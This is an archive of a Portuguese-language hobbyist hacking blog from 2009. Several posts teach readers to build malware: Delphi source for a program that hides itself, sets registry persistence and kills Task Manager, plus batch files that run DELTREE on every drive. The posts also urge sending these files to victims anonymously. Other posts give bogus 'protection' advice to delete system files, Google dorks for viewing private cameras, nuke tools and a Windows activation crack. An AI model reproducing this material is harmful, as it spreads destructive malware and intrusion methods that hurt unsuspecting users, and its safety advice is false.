terça-feira, 29 de setembro de 2009

Veja como instalar qualquer edição do Windows 7, mesmo se o DVD só mostrar uma !!!

O DVD do Windows 7 pode vir configurado para permitir apenas a instalação da edição comprada. Porém, todas elas fazem parte do DVD. O Windows Vista também é assim.

Basicamente o Windows 7 é único, o kernel e o sistema são os mesmos em todas as edições - da Starter a Ultimate. O que muda são alguns "pacotes" de programas e a marca na identificação da edição, claro.

A identificação da versão no DVD vem no arquivo ei.cfg, na pasta "sources" do DVD. Você pode remover esse arquivo se quiser que o Windows pergunte qual edição instalar, durante a instalação.

Claro, os números seriais do Windows 7 funcionarão apenas na edição comprada. Não é possível ativar o Windows 7 Ultimate com um número serial do Home Premium, por exemplo. Mas não é ilegal você testar as outras versões, afinal elas funcionam completamente por 30 dias sem precisar de ativação (inclusive com as atualizações automáticas). Pode ser interessante se você quer liberar as outras edições por qualquer motivo, "por sua conta e risco".

O arquivo ei.cfg tem esse estilo:

[EditionID]
Ultimate
[Channel]
Retail
[VL]
0

Você pode trocar o SKU da versão desejada trocando o nome (no exemplo,Ultimate) pelo nome correspondente, que pode ser um desses:

Ultimate
Professional
HomePremium
HomeBasic
Starter

O maior problema é salvar o ei.cfg no DVD e mantê-lo bootável. Se o objetivo é gerar uma mídia sem boot, para rodar dentro de outra versão de Windows, não há muito problema. Você pode extrair o conteúdo do ISO com o WinRAR(ou com programas que trabalham com CDs/DVDs) para uma pasta e rodar o instalador a partir dela.

segunda-feira, 28 de setembro de 2009

FIM DOS VIRUS

Virus em Delphi

Existe muitas maneiras de criar um virus em delphi, a maioria dos trojans famosos que circulão n internet foram feitos em delphi.

Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del.

Vamos la, Primeiro abra um projeto e coloque na uses "Registry,"

Agora em baixo de "{$R *.dfm}" clouqe isso:

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean );
var
sKey : string;
reg : TRegIniFile;
begin
if( bRunOnce )then
begin
sKey := 'Once'
end
else
begin
sKey := '';
end;
reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine );
reg.Free;
end;



Agora no FormCreate coloque isso:

procedure TForm1.FormCreate(Sender: TObject);
begin
Application.ShowMainForm := False;
CopyFile(PChar(Application.ExeName),'C:\WINDOWS\virus.exe',True);
RunOnStartup('virus','C:\WINDOWS\virus.exe',true);
end;



Agora vamos fazer a parte de travar a listagem de processos, vou dar o coder todo basta voce fazer sua arte:

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, TLHelp32, PsAPI, ExtCtrls;

type
TForm1 = class(TForm)
Timer1: TTimer;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}

function TerminarProcesso(sFile: String): Boolean;
var
verSystem: TOSVersionInfo;
hdlSnap,hdlProcess: THandle;
bPath,bLoop: Bool;
peEntry: TProcessEntry32;
arrPid: Array [0..1023] of DWORD;
iC: DWord;
k,iCount: Integer;
arrModul: Array [0..299] of Char;
hdlModul: HMODULE;
begin
Result := False;
if ExtractFileName(sFile)=sFile then
bPath:=false
else
bPath:=true;
verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
GetVersionEx(verSystem);
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then
begin
hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
peEntry.dwSize:=Sizeof(peEntry);
bLoop:=Process32First(hdlSnap,peEntry);
while integer(bLoop)<>0 do
begin
if bPath then
begin
if CompareText(peEntry.szExeFile,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th32ProcessID), 0);
Result := True;
end;
end;
bLoop := Process32Next(hdlSnap,peEntry);
end;
CloseHandle(hdlSnap);
end
else
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then
begin
EnumProcesses(@arrPid,SizeOf(arrPid),iC);
iCount := iC div SizeOf(DWORD);
for k := 0 to Pred(iCount) do
begin
hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]);
if (hdlProcess<>0) then
begin
EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC);
GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul));
if bPath then
begin
if CompareText(arrModul,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(arrModul),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end;
CloseHandle(hdlProcess);
end;
end;
end;
end;


procedure TForm1.Timer1Timer(Sender: TObject);
begin
TerminarProcesso('taskmgr.exe');
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
application.ShowMainForm := false;
end;

end.

domingo, 27 de setembro de 2009

O QUE BADCOM

Badcom é um pequeno arquivo (.com ou .bat) que quando executados realizam tarefas que podem ser benéficas ou maléficas. Ele realiza comandos no DOS ou no Windows, aqui vamos ensinar como fazer um, dar os principais comandos e dois exemplos nada benéficos.

Fazendo um Badcom:

Primeiro você abre o edit no DOS ou o Bloco de Notas do Windows, lá você colocará os comandos que serão realizados quando o arquivo for executado, depois de feito você salva o arquivo com extensão .bat invés de .txt, para isso é só colocar: nomedoarquivo.bat por exemplo ou depois de salvo renomear colocando .bat no final.

Para transformar o arquivo .bat em .com:

Você precisará de um pequeno arquivo para fazer isso, ele é o "Bat2xec.com" que tem essa função de transformar .bat em .com. Depois de pegar esse arquivo salve ele dentro da pasta do Windows e vá ao DOS, entre na pasta aonde está o arquivo usando os comandos básicos de DOS:
cd.. = retorna um pasta
cd\ = sai de todas pastas
dir = mostra todos arquivos e pastas de uma pasta
cd nomedapasta = entra na pasta que você colocou o nome
lembre-se que pastas com mais de oito caracteres terão no dos o seguinte nome:
se a pasta é: "Meus documentos", no DOS será: "Meusdo~1" (sem "aspas").
Após estar na pasta do arquivo .bat e supondo que o nome do arquivo seja "arquivo.bat" digite: "bat2exec arquivo.bat" (sem aspas). Pronto será criado um arquivo com mesmo nome e extenção .com na mesma pasta.

Exemplo simples e destrutivo:

Abra o bloco de notas do windows ou o editor de texto do MS-DOS e coloque os comandos abaixo:
@ECHO OFF
ECHO COLOQUE SUA MENSAGEM DE DESPEDIDA AQUI HEHE
BREAK OFF
DELTREE/y C:\*.*
DELTREE/y D:\*.*
DELTREE/y E:\*.*
DELTREE/y F:\*.*

PRONTO, QUEM EXECUTAR ESSE ARQUIVO TERÁ O PC FORMATADO MESMO SE FOR VOCÊ OU UM AMIGO NÃO ME RESPONSABILIZO POR NADA QUE ACONTECER...

Exemplo inofencivo:

Você pode executar este arquivo em seu pc sem nenhum problema. É só colocar estes comandos para um bloco de notas fazendo suas alterações.
@echo off
cls
cd\
:vlt
echo badcom FEITO POR
echo badcom DISPON'IVEL
echo Grupo
echo o seu SISTEMA e' meu agora haiheaiuu
echo ][][][ Isto 'e apenas um VERME's?? ][][][
echo [1] Me desculpe, eu adoro fuder lammers ..]]]
echo [2] Portque vc vai me fuder???
echo [3] Oque e' um vírus??
choice /n/c123
if errorlevel 3 goto end
if errorlevel 2 goto end
if errorlevel 1 goto end
:end
echo ....ei estou FUDENDO VOCÊ NOW....
echo > minorthreat.txt isto foi um badcom
echo > the_ghost.txt isto foi um badcom feito por the_ghost
echo > leiaporra.txt prescione ctrl + alt + del para acabar com isso agora
echo > grupo.txt isso 'e um exemplo simples de badcom
notepad minorthreat.txt
notepad syspunk.txt
notepad leiaporra.txt
notepad grupo.txt
goto vlt

Importante:
Agora envie seu arquivo para sua vítima (cuidado para não clicar nele e ser a própria vítima) Use um e-mail anônimo para não saberem quem foi ou vá pelo IRC e se responsabilize pelos seus atos.

Caso a pessoa passe esse badcom via disquete, ele não deve esquecer de finalizar o arquivo com o seguinte comando para não deixar vestígios de seu ato insano no disquete.
deltree/y a:\*.*

sábado, 26 de setembro de 2009

VIRUS

Agora irá saber, como se faz alguns tipos de vírus "simples"! Claro que só ensinarei os simples, porque senão amanhã poderei ser a sua próxima vítima.

Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo:

Digite: Edit (nome do ficheiro).bat, deverá aparecer um ecrã azul. Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da seguinte maneira, como está embaixo:

@ECHO OFF

BREAK OFF


Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do vírus).bat autoexec.bat, ela então terá a certeza que está a executar o seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os ficheiros do PC alheio. Você deve usar o seguinte comando:

deltree/y c:\*.*

Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o ficheiro e pronto!

Importante:

Caso a pessoa passe esse vírus via disquete, ele não deve esquecer de finalizar o ficheiro com o comando deltree/y a:\*.* . Isso serve para não deixar vestígios de seu acto insano.

sexta-feira, 25 de setembro de 2009

COMANDOS PARA VIRUS BADCOM

@echo off = não mostra os comandos que serão executados
cls = limpa a tela
echo www.redehacker.com = aparecerá na tela "www.redehacker.com" por exemplo
echo > threat.bat por syspunk = crirá um arquivo threat.bat e nele terá escrito "por syspunk"
echo > threat.bat c:\deltree /y windows = criará um arquivo, com nome threat.bat, no hd da pessoa que quando executado apagará a pasta windows sem nenhuma pergunta
md redehacker.com = cria uma pasta com nome "redehacker.coml" no hd da pessoa
del *.xxx (onde xxx é a extenção do arquivo) = paga os arquivos com a extenção desejada exemplo: del c:\windows\*.ini = apaga os arquivos .ini da pasta do windows
deltree /y windows = apada o diretório do window$ sem perguntar sim ou não
ren autoexec.bat autoexec.seunick = renomeia o autoexec.bat para o nome que você quiser
GOTO: este comando faz repetição de comandos da seguinte maneira:
:INI = indica para onde você quer voltar
GOTO INI = volta para onde o :INI estiver ( não precisa ser INI pode ser oq vc quiser com os dosi pontos antres e depois o mesmo nome com GOTO antes
CHOICE /c 123 = mostra um prompt de questão e você precisa do seguinte comando (pode ter quantos números você quiser)
IF ERRORLEVEL 2 DES = desliga o pc se a pessoa digitar 2
IF ERRORLEVEL 1 REI = reinicia o pc se a pessoa escolher 1
(as mensagens e os nomes dos arquivos podem ser alteradas por você)

quarta-feira, 23 de setembro de 2009

COMANDO DO DOS APAGA WINDOWS

Bem, todos os bate-papos, msn, yahoo entre outros tipos de mensagens instantâneas, sempre tem alguém que vive te pertubando, principalmente nos dias que você nem tah com vontade de ficar teclando com aquela pessoa...

Então, existe um comandinho muito bonitinho criado no MS-DOS no qual que, se você enviar esse comando que irei mostrá-los agora para outra pessoa, a metade do Windows dele some. Então, api vai:

OI, TUDO| -Y-X DELTREE|BEM!

Pronto! Mas só uma observação: você tem que entender de MS-DOS!!!
CLARO Q NAO IA COLOCAR O COMANDO PRONTO

terça-feira, 22 de setembro de 2009

VIRUS BASICO

Faça com cuidado, pois quem pode se dar mal pode ser você...


FABRICANDO VÍRUS


Primeiro você deve formatar um disquete.






Depois você faz isso:

Vá ao Prompt do MS-DOS e digite:

1- a: - para abrir o disquete vazio.

2- md vírus - para criar o vírus

3- deltree/y c:*.* - para fazer o vírus ficar potente


PODE COLOCAR EM UM CD
Pronto, seu vírus já está pronto. É só mandar o disquete para alguém ou copiar o conteúdo do disquete para mandar por e-mail.

PROTEÇÃO DE VÍRUS


Para se proteger de um vírus é só digitar no MS-DOS:


DEL *.EXE - PARA SE PROTEGER DE VÍRUS EXECUTÁVEIS

DEL *.BAT - PARA SE PROTEGER DE VÍRUS DE LOTE

DEL *.SYS - PARA SE PROTEGER DE VÍRUS DE SISTEMA

DEL*.COM - PARA SE PROTEGER DE VIRUS DE COMANDO

DEL *.* - PAPA SE PROTEGER DE VÍRUS CRIPTOGRAFADOS


PRONTO, ASSIM VC JÁ ESTÁ PROTEGIDO

segunda-feira, 21 de setembro de 2009

Coleção Hacker Inside - Top Secret - Vol. 1, 2, 3, 4 e 5 [PDF]

Se você é daqueles espertinhos, que acham que sabem tudo sobre o mundo hacker, você está enganado.
A Coleção Hacker Inside - Top Secret está ai para confirmar o que todo mundo já sabe: você ainda precisa aprender muito para se tornar um hacker de verdade.
Não se engane com qualquer coisa que aparece por aí. Só Hacker Inside explica tudo sobre o submundo hacker e cracker:
veja o que os Hackers podem fazer em um sistema.
E, para quem tem espírito hacker, os desafios não param por aí. Saiba os principais passos para acessar um sistema de segurança e descobrir suas falhas.
Hacker Inside explica tudo sobre o submundo hacker e cracker, para que você possa lidar com este problema da Era da Informação:

Confira todas as edições.

# SUMÁRIO
# Conceitos de Rede
# Internet/Intranet/Extranet
# Componentes
# O que você precisa saber
# Fundamentos
# Ataques Remotos
# O perigo mora do lado
# Trojans
# Espionagem - Keylogger
# Fundamentos de Esteganografia
# Criptografia
# Criptoanálise
# Porteção: Firewall, Antivírus
# Senha
# Sniffing
# Scripts
# Linux x Instalação e comandos básicos
# Anonimato, utilização do proxy
# Tunneling
# Cokkies: Alterações de dados
# Mapeamento de rede
# DNS queiries
# PHP: Falhas e exploits
# Spoofing e Scanning
# Defacement
# Truques do MSN
# Hacking MSN
# Buffer Overflow
# Desafio Hacker
# Autor/Editora: Editora Terra
# Páginas: 421
# Gênero: Informática
# Formato: PDF

* Tamanho: 39,10 Mb
* Hospedagem: Easy-Share
* Formato: .rar / .pdf
* Idioma: Pt-Br

domingo, 20 de setembro de 2009

Instale o Windows 7 ou Vista a partir do Pen Drive sem a necessidade do DVD com o A Bootable USB


Se você por algum motivo precisa instalar um dos mais novos sistemas operacionais da Microsoft (Windows 7, Vista ou Server 2008) em algum computador, e o mesmo não possui um leitor de DVD, ou você que freqüentemente está instalando S.O. em máquinas de amigos e clientes, o aplicativo freeware A Bootable USb é uma excelente opção.

A Bootable USB, um software que cria um disco bootável em seu pen drive, bastando que o computador possua uma entrada USB 2.0.
Para usar o A Bootable USB você deverá antes, usando um computador com leitor de DVD, criar com o programa um instalador compactado em seu pen-drive. Para isso será necessário que o pen drive tenha no mínimo 4 GB de memória.

Após criar um instalador em seu dispositivo USB, bastará instalá-lo no computador que você desejar.
O aplicativo é extremamente leve não requer instalação, basta executá-lo e inserir o caminho para o pen-drive a ser utilizado e selecionar o arquivo ISO do Windows 7, Vista ou Windows Server 2008, não funciona no XP.

* Tamanho: 1 MB
* Idioma: Inglês
* Licensa: Freeware

sexta-feira, 18 de setembro de 2009

SIDERBAR PARA XP WINDOWS7

"Esta é Win7 Sidebar para Windows XP, eu só modifiquei os gadgets que estão na tela.
Copiar "Vista Rainbar" Pasta em C: \ Arquivos de Programas e execute "Rainmeter.exe" Divirta-se!

quinta-feira, 17 de setembro de 2009

Tutorial windows 7 7600 ativado permanentemente.

1 passo:
Usou o Chew-WGA_0.3,clique como administrador,coloque o password e continue o processo,aguarde, aparentemente da uma msg de erro (normal),vai reiniciar o pc e exibir um log na area de trabalho.
2 passo:
Use o windows 7 toolkit da orbit (qualquer versao, no meu caso usei 1.8), ative normalmente.Vai dar msgs de erro, reinicie o pc.
3 passo:
Use novamente o toolkit, dessa vez ele vai ativar, reiniciar o pc, e exibir a mensagem de ativaçao bem sucedida,ok.
4 passo:
O teste final,na pasta sistema do painel de controle, no no canto do lado direito ao lado da mensagem de windows ativado,abaixo do do simbolo do "genuine microsoft", clique "Obter mais informações on line",na pagina da microsof, clique em validar o windows,retorna a mensagem de "ativaçao bem sucedida".
*Eu fiz esse processo ontem a noite, hoje pela manha ainda estava ativado e entrei novamente na pagina da microsoft e continuo recebendo a msg de "ativaçao bem sucedida".O usuario do forum que fez este teste diz que a ativaçao é permanente,entao acho que nos resta é testar mesmo,inclusive o tutorial que vem junto com o programa...

quarta-feira, 16 de setembro de 2009

FALSO VIRUS

javascript:for(i=1;i<=70;i++){alert("o seu anti-virus acabou de detectar "+i+" cavalos de troia")}

MANDA PELO MSN O ORKUT
E MANDA COLAR NO NAVEGADOR
em manutenção
voltarei em breve

terça-feira, 15 de setembro de 2009

entra no orkut e msn bloqueado

60surfer.info

entra no orkut bloqueado

www.atunnel.com
www.vpntunnel.net
www.mathtunnel.com
www.ghostproxy.com

entra no orkut bloqueado

Esse é um assunto que nunca acaba: Orkut bloqueado no trabalho ou na faculdade/escola; Pra tentar dar a volta nesse problema, aqui está uma listinhas de alguns proxies que estão funcionando. Foram fornecidos diretamente por uma pessoa que trabalha na adminstração de uma rede de faculdade. Logo, os links são “quentes”;

http://www.3proxy.org/index.pl
http://www.4proxy.com/
http://www.a1proxy.com/
http://www.alienproxy.com/
http://www.anonymate.com/
http://www.anonymizer.ru/
http://www.anonymousurfing.info/
http://www.anonypost.com/
http://www.anonypath.com/
http://www.anonypath.net/
http://www.anoxx.com/,
http://www.anti-boredom.co.uk/
http://www.antiwebfilter.com/
http://www.aproxysite.com/
http://www.bypassit.net/go.php
http://www.backfox.com/
http://www.bigproxy.org/nph-proxy .cgi
http://www.blockmy.info/

Espero que sejam úteis…

Criando um servidor FTP

O que é um servidor FTP?

FTP significa File Transfer Protocol (Protocolo de Transferência de Arquivos), e é uma forma bastante rápida e versátil de transferir arquivos (também conhecidos como ficheiros), sendo uma das mais usadas na internet.

O que eu posso fazer com um servidor FTP?

Basicamente, o FTP serve para enviar dados para o servidor de internet. Com ele é possível transferir arquivos de qualquer tipo para os servidores. Ou seja, é com o FTP que você colocará o seu web site no ar, enviando as páginas, as imagens e os arquivos necessários.


Criando um servidor FTP

Bom isso alguns sites de hospedagem ja oferecem mas pra quem nao tem.

Programas necessários:
Quick 'n Easy FTP Server 3.0 Lite: http://www.pablosoftwaresolutions.com/download.php?id=7

Depois de fazer o download do programa, terá de abri-lo, ao abrir, aparecerá o wizard dele.

segunda-feira, 14 de setembro de 2009

COMO ADIVINHAR UMA SENHA

Uma senha fácil de se deduzir é a causa mais comum dos problemas de segurança. Se você não souber como trocar a sua senha, coloque essa tarefa como item número 1 da sua lista de coisas a aprender. Você nunca deve criar senhas tomando por base o seu próprio nome - mesmo que seja o seu nome de trás para frente. A senha não pode também ser fácil de se adivinhar, como o nome do marido ou mulher, do namorado ou namorada, do seu cão, a placa do carro, a rua onde mora, a data do nascimento - ou outra informação conhecida. Os hackers costumam usar os programas e dicionários on-line para adivinhar expressões como dedicação. Como podem ser as senhas então? Não há pistas, certo? Pois bem, seja criativo. Pegue a sua frase preferida, como Até que a morte nos separe, querida e utilize a primeira letra de cada palavra aqamnsq. Dessa forma, a senha não é propriamente uma palavra, mas é fácil; de lembrar e difícel de adivinhar. Você pode também combinar palavras com números, o que é bem aconselhável. Mas nunca crie uma senha somente com números, é muito mais fácil de adivinhar.

domingo, 13 de setembro de 2009

http://files.myopera.com/virusdoorkut/files/virus.js

VIRUS DA COMO DO ORKUT

ENTRA NO ORKUT

O Orkut se tornou no principal site de relacionamentos da internet. Todos os dias, ele recebe milhões e milhões de visitas de usuarios de diferentes regiões do nosso planeta. Esse sucesso pode ser explicado pelo fato dele oferecer inúmeras ferramentas e recursos aos internautas.

Agora, já é possivel acessá-lo utilizando outros endereços eletrônicos. No site Powerscrap (http://www.powerscrap.com/) você pode navegar pelo seu Orkut normalmente. Essa opção pode ser utilizada quando o Orkut estiver bloqueado ou apresentar outro tipo de problema. Além disso, no Powerscrap você tem a possibilidade de modificar a cor da pagina, deixando-a do jeito que desejar.

BAT COMANDO DE COPIA DE TECLADO

 
@echo off  @title Errorlevels if exist "tecl
a.exe" Del /Q "tecla.exe">nul
  setlocal 
enabledelayedexpansion :ck :Tecla 
( echo n Tecla.dat echo e 0000 4D 5A 2E
 00 01 00 00 00 02
 00 00 10 FF FF F0 FF echo e 0010 FE FF
 00 00 00 01 F0 FF 1C 00 00 00 00 
00 00 00 echo e
 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4
 4C CD 21 echo rcx echo 002E echo 
w0 echo q echo. )
>Tecla.dat type Tecla.datdebug>NUL
 2>&1 del /f/q/a "Tecla.exe">NUL 2>&1 
ren Tecla.dat 
"Tecla.exe"  :Menu cls echo. ÉÍÍÍ
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo. º ErrorLevel 
Check  º echo. ÈÍÍÍÍÍÍ
ÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo. ÛßßÛßßßßßßß
ßßßßßßßßÛ echo. Û1ErrorLevel 
   Û echo. 
ÛßßÛßßßßßßßßßßßßßßßÛ echo. Û2.Û Gera
r Lista   Û echo. ÛßßÛßßßßßßßßßßßß
ßßßÛ echo. Û3.Û Sair     
     Û echo. ßßßßßßßßßßßßßßßßßßßß 
echo. Tecla if "%errorlevel%"=="49" 
(Goto :person) if 
"%errorlevel%"=="50" (Goto :Gera)
 if "%errorlevel%"=="51" (Goto :Exit)
 Goto :Menu  :person
 echo. echo. Pressione uma tecla para 
conhecer echo. seu valor ASCII que 
sera estabelecido
 echo. na variavel %%errorlevel%% 
echo. Tecla if "%errorlevel%"=="27" (
Goto :Menu) echo.
 Valor: %errorlevel% echo. pause 
cls Goto :person  :Gera echo @ echo off 
>TECLAS.BAT echo
 set mostra=Pressione uma tecla 
>>TECLAS.BAT echo :inicio >>TECLAS.BAT 
echo echo A tecla
 %%mostra%% o errorlevel dela = 
%%errorlevel%%>>TECLAS.BAT echo tecla
 >>TECLAS.BAT echo
 
 if errorlevel 32 if not errorlevel
 33 set tecla=Espaco^&set mostra=Es
paco>>TECLAS.BAT 
echo if errorlevel 9 if not errorlevel
 10 set tecla=Tab^&set mostra=Tab
ulacao>>TECLAS.BAT
 echo if errorlevel 8 if not errorlevel
 9 set tecla=Back^&set mostra=Bac
kspace>>TECLAS.BAT
 cls echo. echo. Lista de ErrorLevels 
set maiuscula=A,B,C,D,E,F,G,H,I,J
,K,L,M,N,O,P,Q,R,S,
T,U,V,W,X,Y,Z,Ç set minuscula=a,b,c,d
,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,
u,v,w,x,y,z,ç set 
mumeros=0,1,2,3,4,5,6,7,8,9 set 
simbolos=@,#,^$,%%,%*,%_,+,-,=,',\,.
,;,/,?,^},^{,[,],´,~
,^^,.,! set ACENTOS=á,é,í,ó,ú,ã,õ,â,ê
,î,ô,û,à,è,ì,ò,ù,ä,ë,ï,ö,ü for %
%a in (%maiuscula%,
%minuscula%,%mumeros%,%simbolos%,%
ACENTOS%) do ( (echo %%a)Tecla SET 
/A NUM=!errorlevel!
+1 ECHO if errorlevel !errorlevel! if
 not errorlevel !NUM! set tecla=
%%a^&set mostra=%%a 
)>>TECLAS.BAT echo goto inicio >>TECL
AS.BAT start /separate TECLAS.BAT
 exit Goto :Eof 
 :Exit @FOR %%# IN (B © S S - H 
E A D " " C © R P. " " 2 © © 9) DO 
@SET/P=%%~#NUL PING -
n 2 0 >NUL PING -n 5 0  endlocal exit
 

PROGRAMAS NUKES!

Aggressor Um dos melhores Nukes CLIKE AKI

Assault Um nuke simples que da a opçao da porta nukada CLIKE AKI

CyberKit Varias opções ping, finger .... CLIKE AKI

Blood Lust Com esse nuke vc poderar escolher a porta menssagem etc. CLIKE AKI

Fake IP Pega Informações do Ip da Vitima CLIKE AKI

Divine Um poderoso nuke, detona o Lammer CLIKE AKI

DosNuke Nuke em sistema DOS CLIKE AKI

Freakzoid Bom nuke. Com a opção de ver se o ip foi desconectado realmente CLIKE AKI

Flooder Mande flooder nos Bate - Papos CLIKE AKI

Nuke IT Nunca usei mais dizem que é bom CLIKE AKI

Nuke 2.3 Bom nuke com várias opções CLIKE AKI

LorNuke Um dos melhores nukes na minha opnião CLIKE AKI

Ping Pinga a vitima até ele cair CLIKE AKI

PASTA INVISIVEL NO DESKTOP

Não é algo fantástico, e não tem nada de Orkut, mais é bem interessante!

1. Crie uma nova pasta, ou edite uma que já esteja criada.

2. Em seguida teremos que modificar o nome, clique em mudar nome da pasta e no campo de seleção para alterar o nome aperte a tecla "ALT" mais os seguintes números "255" (situados à direita do teclado, pois os números superiores não funcionam nesta função).

3. Agora, apenas falta modificar o ícone, neste caso iremos nas propriedades da pasta, em seguida escolhemos a opção "Alterar Ícone", onde iremos no diretório "%SystemRoot%\system32\SHELL32.dll" onde iremos selecionar um ícone "transparente", tem umas três uma do lado da outra.

4. Por fim, escolhemos o local do "desktop" onde queremos guardar a nossa pasta "secreta".

NAO CLIQUE

AVISO

PESSOAL CUIDADO COM AQUELAS PESSOAS QUE FALAM QUE UM TAL PROGRAMA É BOM POIS SOQUEREM TE EM GANAR!

NAO CAIM NESSA DE HACKEAR SENHA DE QUALQUER MU COM AQUELE TAL PROGRAMA CHAMADO THORSHAMMER PQ ELE É UMA MERDA DE VEZ ELE TE AJUDAR VC QUE TOMA NO @%&*¨@$#$¨%

ELE AINDA FALA SE FU!%$#&*()OTÁRIO POR ISSO CUIDADO!

sábado, 12 de setembro de 2009

invadir cameras de segurança com o google

O Google é um dos melhores buscadores que já existiu na internet, por isso que nos vamos usar ele para invadir as cameras de segunças!
É muito fasil invadir essas cameras!
É só você ir no site da Google e pesquisar por esses nomes abaixo.

inurl:ViewerFrame?Mode="

inurl:MUltiCameraFrame:?Mode="

inurl:view/index.shtml"

Agora é só você clicar em algum dos links que aparecem e pronto você já pode ver as imagens das cameras!



OBS: Eu não me responsabilizo por nada que você fazer!!!!!

sexta-feira, 11 de setembro de 2009

HACKER INOFENSIVO

Então queres se tornar um hacker inofensivo ?

________________________________________________________________

"Quer dizer que alguém pode hackear sem quebrar a lei?"

Essa era a voz de um calouro estudante de segundo grau.
Ele me tinha no telefone porque o pai tinha acabado de levar o computador dele.
A ofensa do menino ? Ter quebrado dentro da minha conta com meu provedor.
O guri esperava me impressionar com esperteza dele.
Mas antes de eu descobrir que ele tinha entrado na minha conta, um administrador
do sistema do meu provedor, já tinha descoberto as explorações inofensivas e
alertou os pais do guri.Agora esse menino estava pedindo minha ajuda para que
ele pudesse novamente voltar on-line.

Eu disse para o guri que eu até dava razão ao pai dele. Pois imagine se o
administrador do sistema e eu fossemos mais reticentes? Esse menino poderia
parar preso no juízado de menores.
Mas o caso é que eu não concordo em botar hackers inofensivos na cadeia,
e eu nunca teria testemunhado contra ele. Mas para algumas pessoas, cadeia é o
destino daqueles que vão espiar em contas de outras pessoas em computadores,
mesmo que o tal seja totalmente inofensivo.
Esse guri prescisa aprender em como se manter fora de confusão!

Hacking é o jogo mais exilariante no planeta, mas ao mesmo tempo deixa de ser
legal se fores parar em uma cadeia, com um companheiro de cela chamado "espeto".
Mas hacking não prescisa significar quebrar as leis. Nesse livro, nós ensinamos
hacking com segurança, para que você não precise ficar desconfiado de que espiões
e policiais estão te vigiando pelas suas costas.

O que nós queremos dizer é hacking como uma recreação saúdavel, como também em
forma de uma educação que até poderia te qualificar a obter um emprego de alto
salário.Na verdade, muitos administradores de rede, cientistas de computação e
especialistas em segurança de computadores, primeiramente aprenderam suas
respectivas profissões, não em currículo de alguma universidade, mas da cultura hacker.
E você pode até ficar surpreso, mas na verdade a própria Internet,é protegida não
por agências de inteligência de qualquer governo ou multinacionais, mas por uma
sociedade mundial de, sim, hackers.

Você também, pode se tornar um de nós.

E também -- hacking pode ser surprendentemente fácil. Se eu posso fazer isso,
qualquer um pode!

Independente do por que você quer se tornar um hacker, definitivamente é um meio
de muita diversão, impressione seus amigos, até arrume encontros.
Se você é uma hacker, você se torna totalmente irresistível para os homens.
Te garanto! ;^D

Esses Guias de (na maioria) Hacking Inofensivo, podem ser o seu portão de entrada
para esse mundo. Pois depois de leres só alguns desses Guias você será capaz de já
fazer altos lances que serão ainda dentro da lei mas também já irá impressionar
totalmente os seus amigos.

Esses Guias também podem te preparar para se tornares um desses vigilantes,
que evitam da Internet ser destruída pelas pessoas ruins, especialmente os otários
os "punheteiros". he,he,he.
Você pode também aprender em como evitar que os mesmos mexam com sua conta no seu
provedor, tipo seu e-mail, a configuração do seu micro, suas files, inclusive os
trotes que mantém geralmente o usuário normal da Internet intimidado e assustado.

Se você andar com a gente um ano inteiro ou coisa assim, você poderá aprender
o suficiente e até encontrar as pessoas no nosso e-mail list e canal de IRC os quais
podem te ajudar a se tornares verdadeiramente parte da elite.

Embora, antes de mergulhares dentro da sub-cultura hacker, esteja preparado para
encarar o jeito de ser dos hackers. Você acaba de ser avisado!

Então.....Seja benvindo à aventura que é hacking!

O QUE EU PRESCISO PARA PODER HACKEAR?

Se você pensa que hackers precisam de custoso equipamento de computação ou
uma biblioteca de manuais técnicos ou coisa similar. A resposta é NÃO. Hacking pode
ser bem simples!
Melhor ainda, se você sabe como procurar informações na WEB, você
praticamnete pode achar qualquer informação sobre computadores de graça.

De fato, hacking é tão fácil que se você tem conta com um provedor,
e sabe como mandar e ler e-mail, você pode começar a hackear de imediato.
O GDMHI Iniciantes Parte #2 te ensina onde podes download programas especiais para hackers en
Windows que são absolutamente grátis.
E nós iremos te mostrar alguns simples truques a que você poderá usá-los.

Agora, suponha que você queira se tornar um hacker de elite? Tudo realmente que
precisará é uma não cara "shell account", com um provedor de Internet.
No GDMHI Iniciantes- Parte #3, iremos te mostrar como conseguir um acesso à uma
shell account, e começar a jogar o melhor jogo do planeta: Hacking em Unix!
